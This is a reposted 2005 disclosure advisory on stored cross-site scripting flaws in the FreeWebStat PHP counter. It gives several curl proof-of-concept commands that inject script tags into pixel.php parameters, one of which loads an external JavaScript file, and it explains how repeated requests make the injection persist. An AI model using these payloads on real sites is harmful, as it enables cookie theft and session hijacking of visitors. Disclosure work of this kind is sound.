FreeWebStat is a web statistics and counter application used to FreeWebStat is a web statistics and counter application used to track website traffic. The "Multiple Cross-Site Scripting" (XSS) vulnerability refers to a series of security flaws discovered within this application.
These vulnerabilities typically arose because FreeWebStat failed to properly sanitize or validate user-supplied input across various fields and parameters. Attackers could inject malicious client-side scripts (e.g., JavaScript) into these unsanitized inputs.
When other users viewed pages containing this injected code, their browsers would execute the script. This allowed attackers to:
* Steal session cookies, potentially leading to session hijacking.
* Deface web pages or inject malicious content.
* Redirect users to malicious sites.
* Perform actions on behalf of the victim user.
The "multiple" aspect indicates that these XSS flaws were present in several different parts or functionalities of the FreeWebStat application, making it broadly susceptible to such attacks.
FreeWebStat Multiple XSS Vulnerabilities
Name Multiple XSS Vulnerabilities in FreeWebStat
Systems Affected FreeWebStat (verified on 1.0 rev37)
Severity Medium Risk
Vendor www.freewebstat.com
Advisory http://www_ush_it/2005/11/25/free-web-stat/
Author Francesco "aScii" Ongaro (ascii at katamail . com)
Date 20051125
I. BACKGROUND
FreeWebStat is a PHP stats program, more information is
available at the vendor site.
II. DESCRIPTION
FreeWebStat 1.0 rev37 (the last version at the write time)
is vulnerable to multiple XSS. The impact is a little bugger
since datas will be stored to file and the result of a single
query will persist for some time on the backend. A well-timed
loop of requests will assure the XSS to be permanent.
We issued an advisory for an other application of the same
author called "Php Web Statistik Multiple Vulnerabilities"
who said "new version with all fixed bugs can be found
under www.freewebstat.com". Well, we downloaded this version
and seen the same type of vulnerabilities..
The old advisory:
http://www_ush_it/2005/11/19/php-web-statistik/
III. ANALYSIS
This vulnerability can be exploited by a GET query.
1) logdb.html XSS
logdb.html is vulnerable to JS injection using
anti-escape methods (eg: single quotes will be stripped
but there are a lot of working workrounds for this)
1.1) Curl the pixel.php
curl "http://local.asciistation.zapto.org/fws/pixel.php
?domain=<script>alert(1)</script>
&site=<script>alert(2)</script>
&jsref=<script>alert(3)</script>
&jsres=<script>alert(4)</script>
&jscolor=<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"
$site, $jsref, &jsres and $jscolor are vulnerable.
Loading an url in $jsref will give you a full link (if the logdb.html
page have any pr you can drain some of it.
1.2) Call stats.php
This will generate the new logdb.html file.
1.3) Visit logdb.html
You will see some alerts. : )
The order with the example query is 2 3 2 3 4 5.
1.4) Some test curls
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=<script>alert(123)&jsref=1024x768
&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=
lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red"
-e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start=
10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1; (R1 1.3))"
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13
37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
domain=<script>alert(1)</script>&site=
<script>alert(2)&jsref=</script><script>alert(3)</script>
&jsres=<script>alert(4)</script>&jscolor=
<script>alert(5)</script>"
-A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))"
-e "http://www_ush_it"
2) stat.php search key XSS
2) Detecting the search key XSS
- if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) )
+ if (TRUE)
# save the referer except the own domain name.
if the browser value is empty, do not save
+ echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>";
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it&
site=aa&jsref=sukasuka&jsres=1337&jscolor=red"
Will display as many "DEBUG sukasuka" under the header and over the
"summary" as the number of new queries.
# save the referer except the own domain name.
if the browser value is empty, do not save
if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain )
=== FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) )
$logfile_entries[7] is the $jsref variable.
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=ssss&domain="
search words ( 1 ) lello splendor 100 % 1
search engines ( 1 ) Google 100 % 1
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=lello+splendor++&hl=it"
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?
site=&jsres=&jscolor=&jsref=http://www.google.it/search?
q=<script>alert(123456789)</script>++&hl=it"
Now the injection is executed in 2 points, the referer table and the keyword
table.
2.2) Exploiting the search key XSS
stat.php give us some tricks, and we are evil. The string will be
lowered and any + or - char will became a (real, not a %20) space.
$terms = str_replace( '\"', "", $terms ); # delete \"
$terms = strtolower( $terms ); # string to lower
$terms = str_replace( "+" , " ", $terms ); # replace + with space
$terms = str_replace( "-" , " ", $terms ); # replace - with space
ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site=
&jsres=&jscolor=&jsref=http://www.google.it/search?
q=ppoopp<script language="javascript"-src=
"http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it"
IV. DETECTION
FreeWebStat 1.0 rev37 is vulnerable.
Older version not verified.
V. WORKAROUND
Input validation will fix the vulnerability.
VI. VENDOR RESPONSE
Vendor will fix and release a new version.
VII. CVE INFORMATION
No CVE at this time.
VIII. DISCLOSURE TIMELINE
20051125 Bug discovered
20051125 Developer notification
20051125 Advisory released
20051128 Vendor response
IX. CREDIT
ascii is credited with the discovery of this vulnerability.
X. LEGAL NOTICES
Copyright (c) 2005 Francesco "aScii" Ongaro
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.
FreeWebStat Multiple Cross Site Scripting
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 13
